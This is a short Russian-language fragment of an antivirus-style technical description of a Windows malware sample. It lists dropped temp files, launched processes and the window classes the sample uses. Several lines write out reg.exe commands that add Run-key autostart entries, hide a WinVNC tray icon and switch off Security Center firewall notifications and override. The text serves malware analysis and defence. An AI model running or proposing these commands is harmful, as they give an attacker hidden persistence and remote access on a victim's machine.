Техническая информация
- Центр обеспечения безопасности (Security Center)
- <Текущая директория>\B2E.tmp
- <SYSTEM32>\reg.exe add hklm\software\microsoft\windows\currentversion\policies\explorer\run /v system32 /t REG_SZ /d <SYSTEM32>\sysmain.exe /f
- <SYSTEM32>\reg.exe add hkcu\software\microsoft\windows\currentversion\policies\explorer\run /v winhelp32 /t REG_SZ /d <SYSTEM32>\winhelp.exe /f
- <SYSTEM32>\ntvdm.exe -f -i1 -w -a <SYSTEM32>\krnl386.exe
- <SYSTEM32>\reg.exe add hklm\software\orl\winvnc3 /v disabletrayicon /t REG_DWORD /d 00000001 /f
- <SYSTEM32>\cmd.exe /c ""%TEMP%\zer0pwn.bat" "
- <SYSTEM32>\reg.exe add "hklm\software\microsoft\security center" /v firewalldisablenotify /t REG_DWORD /d 00000001 /f
- <SYSTEM32>\reg.exe add "hklm\software\microsoft\security center" /v firewalloverride /t REG_DWORD /d 00000001 /f
- [<HKLM>\software\orl\winvnc3]
- %TEMP%\zer0pwn.bat
- %TEMP%\files.tmp
- %TEMP%\delete.bat
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\scs1.tmp
- %TEMP%\B2E2.tmp
- %TEMP%\B2E.tmp
- <Текущая директория>\B2E.tmp
- %TEMP%\tempfile.dat
- %TEMP%\tempfile.exe
- %TEMP%\delete.bat
- %TEMP%\files.tmp
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\scs1.tmp
- %TEMP%\B2E2.tmp
- %TEMP%\B2E.tmp
- %TEMP%\tempfile.dat
- %TEMP%\tempfile.exe
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'WOWFaxClass' WindowName: ''